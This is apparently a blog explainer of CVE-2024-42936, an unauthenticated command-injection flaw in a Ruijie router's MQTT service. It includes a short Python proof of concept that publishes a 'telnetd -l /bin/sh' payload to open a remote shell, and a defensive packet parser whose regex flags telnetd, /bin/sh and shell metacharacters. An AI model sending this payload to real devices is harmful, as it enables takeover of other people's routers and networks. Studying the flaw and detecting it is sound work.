CVE-2024-42936 - Remote Code Execution in Ruijie RG-EW300N via MQTT (mqlink.elf) – Explained
CVE-2024-42936 uncovers a serious vulnerability in the Ruijie RG-EW300N wireless router running firmware ReyeeOS 1.300.1422. In this post, you’ll learn what this vulnerability is about, how it’s exploited, and what you can do to protect yourself. We’ll keep things simple, cite credible sources, and show you an example exploit.
What’s the Story?
The mqlink.elf binary is a service on the Ruijie RG-EW300N. It communicates using the MQTT protocol, which is widely used in IoT devices for messaging. This binary contains a Remote Code Execution (RCE) flaw: a specially-crafted MQTT message can trigger execution of arbitrary commands on the router.
The impact: Attackers can gain complete control over the device, run their code, steal data, inject malware, or pivot attacks into your internal network—all without authentication.
Where is the Bug?
The bug is in how the mqlink.elf service parses messages from an MQTT broker. Because the service does not strictly validate input, system commands can be injected by tampering with specific message fields (for example, payloads, topics, or headers).
- Direct Execution: User-controlled data is passed straight to a command shell or system function.
- Network-Accessible: mqlink.elf listens for messages on the local network, and sometimes even from the internet if the admin is careless.
Component: mqlink.elf
If you have this device and version, you are *vulnerable*.
The Exploit (Code Snippet)
Below is a conceptual proof-of-concept (PoC). This uses Python and the paho-mqtt library.
Note: This is for educational use only. Do not attempt unauthorized actions on devices you do not own!
```python
import paho.mqtt.client as mqtt

# Target device IP and port
target_ip = "192.168..1" # Example: change to your device IP
target_port = 1883 # Default MQTT port

# Malicious payload to spawn a telnet shell
payload = '{"cmd":"telnetd -l /bin/sh"}'

# The vulnerable topic (simplified – real topic may differ)
topic = "/ruijie/mqlink/cmd"

client = mqtt.Client()
client.connect(target_ip, target_port, 60)
client.publish(topic, payload)
client.disconnect()
```
How it works:
This sends a crafted MQTT message to the target device. If the device is vulnerable, it will execute the "cmd" value directly, starting a telnet shell that gives the attacker remote shell access.
Update Firmware:
Check Ruijie’s website for patched firmware and update your device ASAP.
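As an added example (not code from the original post or from Ruijie), the Python below decodes MQTT 3.1.1 PUBLISH packets taken from a capture of plaintext port 1883 traffic and flags JSON string fields that contain shell metacharacters or the strings from the PoC payload above. The pattern list and the function names are assumptions, and because the real topic may differ from the simplified one, it does not filter on topic.

```python
import json
import re

# Assumption: shell metacharacters, or the telnetd and /bin/sh strings from the
# PoC payload, should never appear in a JSON control field.
SUSPICIOUS = re.compile(r"[;&|`$<>\n]|\btelnetd\b|/bin/sh\b")

def parse_publish(packet: bytes):
    """Decode one MQTT 3.1.1 PUBLISH packet into (topic, payload), else None."""
    if len(packet) < 2 or packet[0] >> 4 != 3:   # control packet type 3 = PUBLISH
        return None
    # Remaining Length: 7 bits per byte, high bit means "more", at most 4 bytes.
    remaining, shift, pos = 0, 0, 1
    while True:
        if pos >= len(packet) or shift > 21:
            return None
        byte = packet[pos]
        remaining |= (byte & 0x7F) << shift
        pos, shift = pos + 1, shift + 7
        if not byte & 0x80:
            break
    body = packet[pos:pos + remaining]
    if len(body) != remaining or remaining < 2:  # truncated or malformed capture
        return None
    topic_len = int.from_bytes(body[:2], "big")
    # A 2-byte packet identifier follows the topic only when QoS (bits 1-2) > 0.
    offset = 2 + topic_len + (2 if packet[0] & 0x06 else 0)
    if offset > len(body):
        return None
    return body[2:2 + topic_len].decode("utf-8", "replace"), body[offset:]

def flag_publish(packet: bytes):
    """Return (topic, field, value) for JSON string fields that look like commands."""
    parsed = parse_publish(packet)
    if parsed is None:
        return []
    topic, payload = parsed
    try:
        doc = json.loads(payload)
    except ValueError:                           # not JSON or not valid UTF-8
        doc = None
    fields = doc.items() if isinstance(doc, dict) else ()
    return [(topic, k, v) for k, v in fields
            if isinstance(v, str) and SUSPICIOUS.search(v)]

# Constructed sample: QoS 0 PUBLISH with the page's simplified topic and payload.
_T, _P = b"/ruijie/mqlink/cmd", b'{"cmd":"telnetd -l /bin/sh"}'
SAMPLE = bytes([0x30, 2 + len(_T) + len(_P)]) + len(_T).to_bytes(2, "big") + _T + _P
if __name__ == "__main__":
    print(flag_publish(SAMPLE))
```

A hit is a lead for triage rather than proof of compromise, since the character pattern can also match benign values.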
Wrapping Up
CVE-2024-42936 is an alarming example of how weak input validation in IoT software can expose entire homes and businesses. If you’re using a Ruijie RG-EW300N router with ReyeeOS 1.300.1422, *take precautions now*. A patched update and some network lockdown can save you from major headaches later.
Stay safe and keep your devices updated!
*This post is exclusive and written in plain language by SecurityAI. Please don’t use these details for anything malicious—use your knowledge to secure, not to harm.*
Timeline
Published on: 01/21/2025 20:15:30 UTC
Last modified on: 03/20/2025 14:15:20 UTC